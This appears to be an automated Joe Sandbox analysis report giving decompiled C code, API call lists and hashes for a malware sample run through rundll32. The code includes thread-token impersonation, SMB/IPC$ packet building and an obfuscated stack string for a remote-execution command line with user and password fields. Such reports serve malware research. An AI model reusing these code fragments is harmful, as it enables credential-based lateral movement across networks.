                                                                                                                                                  0x0477a408
                                                                                                                                                  0x0477a3f3
                                                                                                                                                  0x0477a3e5
                                                                                                                                                  0x0477a411
                                                                                                                                                  0x0477a41d

                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32 ref: 0477A3C9
                                                                                                                                                  • SetThreadToken.ADVAPI32(?,?,?,?,04777B43,?,?,00000004,0477787C,00000000,000000FF), ref: 0477A3DD
                                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,04777B43,?,?,00000004,0477787C,00000000,000000FF), ref: 0477A3EA
                                                                                                                                                  • GetLastError.KERNEL32(?,?,04777B43,?,?,00000004,0477787C,00000000,000000FF), ref: 0477A3F7
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,04777B43,?,?,00000004,0477787C,00000000,000000FF), ref: 0477A402
                                                                                                                                                  • SetLastError.KERNEL32(00000057,?,?,04777B43,?,?,00000004,0477787C,00000000,000000FF), ref: 0477A411
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2435877492-0
                                                                                                                                                  • Opcode ID: 6fd3c870f693962319463a70965bc5131ed2a71680c53d6737721991abaf692f
                                                                                                                                                  • Instruction ID: a621d56526afc589880b5474a08bc62412693bce4a3ad34780bccb2cbc90b618
                                                                                                                                                  • Opcode Fuzzy Hash: 6fd3c870f693962319463a70965bc5131ed2a71680c53d6737721991abaf692f
                                                                                                                                                  • Instruction Fuzzy Hash: 42018F71601114FBEF208F65ED0CCDE7F78EF85764B604421F505D2240D7749E41EAA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477796E(void* __ecx, void* _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void _v12;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  
                                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                                  				_t12 = CreateThread(0, 0, E04777957,  &_v12, 4, 0);
                                                                                                                                                  				_v8 = _t12;
                                                                                                                                                  				if(_t12 != 0) {
                                                                                                                                                  					if(SetThreadToken( &_v8, _a4) != 0) {
                                                                                                                                                  						if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                  							GetLastError();
                                                                                                                                                  						} else {
                                                                                                                                                  							WaitForSingleObject(_v8, 0xffffffff);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					CloseHandle(_v8);
                                                                                                                                                  				}
                                                                                                                                                  				return _v12;
                                                                                                                                                  			}






                                                                                                                                                  0x04777973
                                                                                                                                                  0x04777988
                                                                                                                                                  0x0477798e
                                                                                                                                                  0x04777993
                                                                                                                                                  0x047779a4
                                                                                                                                                  0x047779b2
                                                                                                                                                  0x047779c1
                                                                                                                                                  0x047779b4
                                                                                                                                                  0x047779b9
                                                                                                                                                  0x047779b9
                                                                                                                                                  0x047779b2
                                                                                                                                                  0x047779ca
                                                                                                                                                  0x047779ca
                                                                                                                                                  0x047779d4

                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32 ref: 04777988
                                                                                                                                                  • SetThreadToken.ADVAPI32(?,00000000,?,?,?,04777B4A,?,?,?,00000004,0477787C,00000000,000000FF), ref: 0477799C
                                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,04777B4A,?,?,?,00000004,0477787C,00000000,000000FF), ref: 047779A9
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,04777B4A,?,?,?,00000004,0477787C,00000000,000000FF), ref: 047779B9
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,04777B4A,?,?,?,00000004,0477787C,00000000,000000FF), ref: 047779C1
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,04777B4A,?,?,?,00000004,0477787C,00000000,000000FF), ref: 047779CA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1168161173-0
                                                                                                                                                  • Opcode ID: 86ea6d1ffe1cf97965ab08fa6149535dad753da091507dc60b6d8429a6076b5e
                                                                                                                                                  • Instruction ID: ba51d06cba18bc4600c28b2af4600b6f78614b7eb5d77f6cc4a2c51266c9d5e2
                                                                                                                                                  • Opcode Fuzzy Hash: 86ea6d1ffe1cf97965ab08fa6149535dad753da091507dc60b6d8429a6076b5e
                                                                                                                                                  • Instruction Fuzzy Hash: 57F0147060020AFBEF249BA0DD0AF9D7B78EF00325FA04250B611E11E0DBB8FA119E14
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04774E60(intOrPtr _a4, void* _a8, short _a12) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				short _t29;
                                                                                                                                                  				signed char* _t31;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				signed char _t45;
                                                                                                                                                  				signed int* _t51;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				intOrPtr _t54;
                                                                                                                                                  				void* _t57;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t27 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                  				_t57 = _t27;
                                                                                                                                                  				if(_t57 == 0) {
                                                                                                                                                  					L11:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t53 = 0x10;
                                                                                                                                                  				do {
                                                                                                                                                  					 *_t27 =  !( *(0x4783730 + _t27));
                                                                                                                                                  					_t27 = _t27 + 1;
                                                                                                                                                  					_t53 = _t53 - 1;
                                                                                                                                                  				} while (_t53 != 0);
                                                                                                                                                  				_t29 = 0x48;
                                                                                                                                                  				 *((short*)(_t57 + 8)) = _t29;
                                                                                                                                                  				 *((short*)(_t57 + 0x10)) = 0x10b8;
                                                                                                                                                  				 *((short*)(_t57 + 0x12)) = 0x10b8;
                                                                                                                                                  				 *((char*)(_t57 + 2)) = 0xb;
                                                                                                                                                  				_t51 = 0x4783700;
                                                                                                                                                  				_t7 = _t57 + 0x18; // 0x18
                                                                                                                                                  				_t31 = _t7;
                                                                                                                                                  				_t54 = 0x30;
                                                                                                                                                  				do {
                                                                                                                                                  					_t45 =  !( *_t51);
                                                                                                                                                  					_t51 =  &(_t51[0]);
                                                                                                                                                  					 *_t31 = _t45;
                                                                                                                                                  					_t31 =  &(_t31[1]);
                                                                                                                                                  					_t54 = _t54 - 1;
                                                                                                                                                  				} while (_t54 != 0);
                                                                                                                                                  				if(E04772F5A(_a4, _a8, _a12, _t54, 0xff, 8, _t57, 0x48) != 0) {
                                                                                                                                                  					_v16 = _v16 & 0x00000000;
                                                                                                                                                  					_v12 = _v12 & 0x00000000;
                                                                                                                                                  					if(E04773071(_t51, _a4, _a8, _a12,  &_v12,  &_v16) != 0) {
                                                                                                                                                  						_t38 = _v12;
                                                                                                                                                  						if(0 ==  *((intOrPtr*)(_t38 + _v16 - 0x18))) {
                                                                                                                                                  							_v5 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t38);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t57);
                                                                                                                                                  				goto L11;
                                                                                                                                                  			}















                                                                                                                                                  0x04774e72
                                                                                                                                                  0x04774e79
                                                                                                                                                  0x04774e7f
                                                                                                                                                  0x04774e83
                                                                                                                                                  0x04774f38
                                                                                                                                                  0x04774f3e
                                                                                                                                                  0x04774f3e
                                                                                                                                                  0x04774e90
                                                                                                                                                  0x04774e94
                                                                                                                                                  0x04774e99
                                                                                                                                                  0x04774e9b
                                                                                                                                                  0x04774e9c
                                                                                                                                                  0x04774e9c
                                                                                                                                                  0x04774ea1
                                                                                                                                                  0x04774ea2
                                                                                                                                                  0x04774eaf
                                                                                                                                                  0x04774eb3
                                                                                                                                                  0x04774eb7
                                                                                                                                                  0x04774ebb
                                                                                                                                                  0x04774ec0
                                                                                                                                                  0x04774ec0
                                                                                                                                                  0x04774ec3
                                                                                                                                                  0x04774ec4
                                                                                                                                                  0x04774ec6
                                                                                                                                                  0x04774ec8
                                                                                                                                                  0x04774ec9
                                                                                                                                                  0x04774ecb
                                                                                                                                                  0x04774ecc
                                                                                                                                                  0x04774ecc
                                                                                                                                                  0x04774ef0
                                                                                                                                                  0x04774ef2
                                                                                                                                                  0x04774ef6
                                                                                                                                                  0x04774f12
                                                                                                                                                  0x04774f14
                                                                                                                                                  0x04774f21
                                                                                                                                                  0x04774f23
                                                                                                                                                  0x04774f23
                                                                                                                                                  0x04774f2d
                                                                                                                                                  0x04774f2d
                                                                                                                                                  0x04774f12
                                                                                                                                                  0x04774f35
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04774E76
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04774E79
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04774F2A
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04774F2D
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04774F32
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04774F35
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Free$Alloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3689955550-0
                                                                                                                                                  • Opcode ID: 1358472816a103a81d655036cf3f76ee3aba9623ca7aba7695729c4eac2193df
                                                                                                                                                  • Instruction ID: a4d2a5763235c26a4610a09562ac145120a00a4b330d63999d0f8d3392cdd379
                                                                                                                                                  • Opcode Fuzzy Hash: 1358472816a103a81d655036cf3f76ee3aba9623ca7aba7695729c4eac2193df
                                                                                                                                                  • Instruction Fuzzy Hash: 7C2146316803447AEF219FA4CC04FEF7F78EF55715F448498F689AB290DA75A909C760
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E047750A2(void* __ecx, intOrPtr _a4, void* _a8, short _a12, signed int _a16) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				short _t27;
                                                                                                                                                  				short _t28;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				signed int _t44;
                                                                                                                                                  				long _t47;
                                                                                                                                                  
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_push(0x34);
                                                                                                                                                  				_t47 = 8;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t25 = HeapAlloc(GetProcessHeap(), _t47, ??);
                                                                                                                                                  				_t39 = _t25;
                                                                                                                                                  				if(_t39 == 0) {
                                                                                                                                                  					L7:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				do {
                                                                                                                                                  					 *_t25 =  !( *(0x4783730 + _t25));
                                                                                                                                                  					_t25 = _t25 + 1;
                                                                                                                                                  					_t47 = _t47 - 1;
                                                                                                                                                  				} while (_t47 != 0);
                                                                                                                                                  				_t27 = 0x34;
                                                                                                                                                  				 *((short*)(_t39 + 8)) = _t27;
                                                                                                                                                  				_t28 = 0x13;
                                                                                                                                                  				_t44 = 5;
                                                                                                                                                  				 *((intOrPtr*)(_t39 + 0xc)) = 3;
                                                                                                                                                  				 *((short*)(_t39 + 0x16)) = _t28;
                                                                                                                                                  				_t10 = _t39 + 0x18; // 0x18
                                                                                                                                                  				memcpy(_t10, _a16, _t44 << 2);
                                                                                                                                                  				if(E04772F5A(_a4, _a8, _a12, 0, 0xff, 8, _t39, 0x34) != 0) {
                                                                                                                                                  					_v12 = _v12 & 0x00000000;
                                                                                                                                                  					_a16 = _a16 & 0x00000000;
                                                                                                                                                  					if(E04773071(0, _a4, _a8, _a12,  &_a16,  &_v12) != 0) {
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _a16);
                                                                                                                                                  						_v5 = 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t39);
                                                                                                                                                  				goto L7;
                                                                                                                                                  			}











                                                                                                                                                  0x047750a5
                                                                                                                                                  0x047750a6
                                                                                                                                                  0x047750a9
                                                                                                                                                  0x047750ad
                                                                                                                                                  0x047750af
                                                                                                                                                  0x047750ba
                                                                                                                                                  0x047750c0
                                                                                                                                                  0x047750c4
                                                                                                                                                  0x04775162
                                                                                                                                                  0x04775168
                                                                                                                                                  0x04775168
                                                                                                                                                  0x047750d2
                                                                                                                                                  0x047750d7
                                                                                                                                                  0x047750d9
                                                                                                                                                  0x047750da
                                                                                                                                                  0x047750da
                                                                                                                                                  0x047750df
                                                                                                                                                  0x047750e5
                                                                                                                                                  0x047750e9
                                                                                                                                                  0x047750ec
                                                                                                                                                  0x047750fc
                                                                                                                                                  0x04775106
                                                                                                                                                  0x0477510d
                                                                                                                                                  0x04775110
                                                                                                                                                  0x0477511f
                                                                                                                                                  0x04775121
                                                                                                                                                  0x04775125
                                                                                                                                                  0x04775141
                                                                                                                                                  0x0477514f
                                                                                                                                                  0x04775151
                                                                                                                                                  0x04775151
                                                                                                                                                  0x04775141
                                                                                                                                                  0x0477515f
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000034,74CB4F20,00000000,?,?,?,047752FD,?,?,?,?,?,?,?,00000000), ref: 047750B3
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,047752FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 047750BA
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,74854DB0), ref: 04775148
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,047752FD,?,?,?,?,?,?,?,00000000,00000000), ref: 0477514F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,74854DB0,?,?,?,047752FD,?), ref: 04775158
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,047752FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0477515F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Free$Alloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3689955550-0
                                                                                                                                                  • Opcode ID: e3e7910e040a6e5ae17771f86a6b312f34030c032e843c45972557b430a18910
                                                                                                                                                  • Instruction ID: 65ef69e6fd3306593f15ba98cc45570d0a4f1b3ee83be00d3b7a460b756f2df3
                                                                                                                                                  • Opcode Fuzzy Hash: e3e7910e040a6e5ae17771f86a6b312f34030c032e843c45972557b430a18910
                                                                                                                                                  • Instruction Fuzzy Hash: A621D032640249BBFF218F94DC48FEB3B6CEF44355F448485FE04AA280C6B5AD15CB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E0477317C(void* __ecx, intOrPtr _a4, intOrPtr* _a8, short _a12) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				signed int _t22;
                                                                                                                                                  				int _t24;
                                                                                                                                                  				signed int _t33;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t19 = HeapAlloc(GetProcessHeap(), 8, 0x200);
                                                                                                                                                  				_v12 = _t19;
                                                                                                                                                  				if(_t19 != 0) {
                                                                                                                                                  					_t37 =  *_a8;
                                                                                                                                                  					_t22 = rand();
                                                                                                                                                  					asm("cdq");
                                                                                                                                                  					_t33 = 0x14;
                                                                                                                                                  					 *((intOrPtr*)(_t37 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t22 % _t33;
                                                                                                                                                  					_t38 = 0;
                                                                                                                                                  					do {
                                                                                                                                                  						_t24 = rand();
                                                                                                                                                  						_t34 = _v12;
                                                                                                                                                  						 *(_t38 + _v12) = _t24;
                                                                                                                                                  						_t38 = _t38 + 1;
                                                                                                                                                  					} while (_t38 < 0x200);
                                                                                                                                                  					if(E04772F5A(_a4,  *_a8, _a12, 0, 0xff, 4, _t34, 0x200) != 0) {
                                                                                                                                                  						_v5 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}










                                                                                                                                                  0x0477318a
                                                                                                                                                  0x04773195
                                                                                                                                                  0x0477319b
                                                                                                                                                  0x047731a0
                                                                                                                                                  0x047731ad
                                                                                                                                                  0x047731af
                                                                                                                                                  0x047731b3
                                                                                                                                                  0x047731b4
                                                                                                                                                  0x047731b7
                                                                                                                                                  0x047731bb
                                                                                                                                                  0x047731bd
                                                                                                                                                  0x047731bd
                                                                                                                                                  0x047731bf
                                                                                                                                                  0x047731c2
                                                                                                                                                  0x047731c5
                                                                                                                                                  0x047731c6
                                                                                                                                                  0x047731e9
                                                                                                                                                  0x047731eb
                                                                                                                                                  0x047731eb
                                                                                                                                                  0x047731fb
                                                                                                                                                  0x047731fb
                                                                                                                                                  0x04773206

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,047747E5,?,?,00000000,?,?,?,?,?,?), ref: 0477318E
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,047747E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04773195
                                                                                                                                                  • rand.MSVCRT ref: 047731AF
                                                                                                                                                  • rand.MSVCRT ref: 047731BD
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,047747E5,?,?,00000000,?), ref: 047731F4
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,047747E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 047731FB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Processrand$AllocFree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1335519115-0
                                                                                                                                                  • Opcode ID: 35b56da10e6716e03ebeca74c843999ad254a1db3ccb547b805d54d834a9f717
                                                                                                                                                  • Instruction ID: 5086ce5b91528cfa456bdfef84f4732dec55c080b25c4ec84af6d93ac2398d20
                                                                                                                                                  • Opcode Fuzzy Hash: 35b56da10e6716e03ebeca74c843999ad254a1db3ccb547b805d54d834a9f717
                                                                                                                                                  • Instruction Fuzzy Hash: 0911C832640305BBEB119B95CC49FDE7F79FF46750F404098FA04AB281DBB5A906D760
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                  			E04779972(WCHAR* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                  				short _v8;
                                                                                                                                                  				short _v10;
                                                                                                                                                  				short _v12;
                                                                                                                                                  				short _v14;
                                                                                                                                                  				short _v16;
                                                                                                                                                  				short _v18;
                                                                                                                                                  				short _v20;
                                                                                                                                                  				short _v22;
                                                                                                                                                  				short _v24;
                                                                                                                                                  				short _v26;
                                                                                                                                                  				short _v28;
                                                                                                                                                  				short _v30;
                                                                                                                                                  				short _v32;
                                                                                                                                                  				short _v34;
                                                                                                                                                  				short _v36;
                                                                                                                                                  				short _v38;
                                                                                                                                                  				short _v40;
                                                                                                                                                  				short _v42;
                                                                                                                                                  				short _v44;
                                                                                                                                                  				short _v46;
                                                                                                                                                  				short _v48;
                                                                                                                                                  				short _v50;
                                                                                                                                                  				short _v52;
                                                                                                                                                  				short _v54;
                                                                                                                                                  				short _v56;
                                                                                                                                                  				short _v58;
                                                                                                                                                  				short _v60;
                                                                                                                                                  				short _v62;
                                                                                                                                                  				short _v64;
                                                                                                                                                  				short _v66;
                                                                                                                                                  				short _v68;
                                                                                                                                                  				short _v70;
                                                                                                                                                  				short _v72;
                                                                                                                                                  				short _v74;
                                                                                                                                                  				short _v76;
                                                                                                                                                  				short _v78;
                                                                                                                                                  				short _v80;
                                                                                                                                                  				short _v82;
                                                                                                                                                  				short _v84;
                                                                                                                                                  				short _v86;
                                                                                                                                                  				short _v88;
                                                                                                                                                  				short _v608;
                                                                                                                                                  				char _v1128;
                                                                                                                                                  				char _v17512;
                                                                                                                                                  				short _t72;
                                                                                                                                                  				short _t73;
                                                                                                                                                  				short _t74;
                                                                                                                                                  				short _t75;
                                                                                                                                                  				short _t76;
                                                                                                                                                  				short _t77;
                                                                                                                                                  				short _t79;
                                                                                                                                                  				short _t81;
                                                                                                                                                  				short _t82;
                                                                                                                                                  				signed int _t86;
                                                                                                                                                  				short _t91;
                                                                                                                                                  				WCHAR* _t96;
                                                                                                                                                  				short _t97;
                                                                                                                                                  				void* _t98;
                                                                                                                                                  				void _t99;
                                                                                                                                                  				signed int _t100;
                                                                                                                                                  				signed short* _t104;
                                                                                                                                                  				short _t107;
                                                                                                                                                  				signed int _t108;
                                                                                                                                                  				short _t109;
                                                                                                                                                  				void* _t112;
                                                                                                                                                  				short _t119;
                                                                                                                                                  				short _t120;
                                                                                                                                                  				short _t121;
                                                                                                                                                  				short _t123;
                                                                                                                                                  				short _t124;
                                                                                                                                                  				short _t125;
                                                                                                                                                  				short _t127;
                                                                                                                                                  				short _t131;
                                                                                                                                                  				short _t132;
                                                                                                                                                  				short _t133;
                                                                                                                                                  				short _t134;
                                                                                                                                                  				short _t135;
                                                                                                                                                  				short _t137;
                                                                                                                                                  				short _t138;
                                                                                                                                                  				short _t139;
                                                                                                                                                  				short _t140;
                                                                                                                                                  				short _t142;
                                                                                                                                                  				signed int _t145;
                                                                                                                                                  				void* _t146;
                                                                                                                                                  
                                                                                                                                                  				_t96 = __ebx;
                                                                                                                                                  				E0477A760(0x4464);
                                                                                                                                                  				 *__ebx = 0;
                                                                                                                                                  				E047788D3( &_v1128);
                                                                                                                                                  				_t72 = 0x2f;
                                                                                                                                                  				_v88 = _t72;
                                                                                                                                                  				_t73 = 0x6e;
                                                                                                                                                  				_v86 = _t73;
                                                                                                                                                  				_t74 = 0x6f;
                                                                                                                                                  				_v84 = _t74;
                                                                                                                                                  				_t75 = 0x64;
                                                                                                                                                  				_v82 = _t75;
                                                                                                                                                  				_t76 = 0x65;
                                                                                                                                                  				_v80 = _t76;
                                                                                                                                                  				_t77 = 0x3a;
                                                                                                                                                  				_t97 = 0x22;
                                                                                                                                                  				_v78 = _t77;
                                                                                                                                                  				_v76 = _t97;
                                                                                                                                                  				_t79 = 0x25;
                                                                                                                                                  				_t107 = 0x77;
                                                                                                                                                  				_v74 = _t79;
                                                                                                                                                  				_v72 = _t107;
                                                                                                                                                  				_t81 = 0x73;
                                                                                                                                                  				_v70 = _t81;
                                                                                                                                                  				_v68 = _t97;
                                                                                                                                                  				_t119 = 0x20;
                                                                                                                                                  				_v66 = _t119;
                                                                                                                                                  				_t120 = 0x2f;
                                                                                                                                                  				_v64 = _t120;
                                                                                                                                                  				_t121 = 0x75;
                                                                                                                                                  				_v62 = _t121;
                                                                                                                                                  				_v60 = _t81;
                                                                                                                                                  				_t123 = 0x65;
                                                                                                                                                  				_v58 = _t123;
                                                                                                                                                  				_t124 = 0x72;
                                                                                                                                                  				_v56 = _t124;
                                                                                                                                                  				_t125 = 0x3a;
                                                                                                                                                  				_v54 = _t125;
                                                                                                                                                  				_v52 = _t97;
                                                                                                                                                  				_t127 = 0x25;
                                                                                                                                                  				_v50 = _t127;
                                                                                                                                                  				_v48 = _t107;
                                                                                                                                                  				_v46 = _t81;
                                                                                                                                                  				_v44 = _t97;
                                                                                                                                                  				_t131 = 0x20;
                                                                                                                                                  				_v42 = _t131;
                                                                                                                                                  				_t132 = 0x2f;
                                                                                                                                                  				_v40 = _t132;
                                                                                                                                                  				_t133 = 0x70;
                                                                                                                                                  				_v38 = _t133;
                                                                                                                                                  				_t134 = 0x61;
                                                                                                                                                  				_v36 = _t134;
                                                                                                                                                  				_t135 = _t81;
                                                                                                                                                  				_v34 = _t135;
                                                                                                                                                  				_v32 = _t135;
                                                                                                                                                  				_v30 = _t107;
                                                                                                                                                  				_t137 = 0x6f;
                                                                                                                                                  				_v28 = _t137;
                                                                                                                                                  				_t138 = 0x72;
                                                                                                                                                  				_v26 = _t138;
                                                                                                                                                  				_t139 = 0x64;
                                                                                                                                                  				_v24 = _t139;
                                                                                                                                                  				_t140 = 0x3a;
                                                                                                                                                  				_v22 = _t140;
                                                                                                                                                  				_v20 = _t97;
                                                                                                                                                  				_t142 = 0x25;
                                                                                                                                                  				_v14 = _t81;
                                                                                                                                                  				_t82 = 0x20;
                                                                                                                                                  				_v10 = _t82;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v18 = _t142;
                                                                                                                                                  				_v16 = _t107;
                                                                                                                                                  				_v12 = _t97;
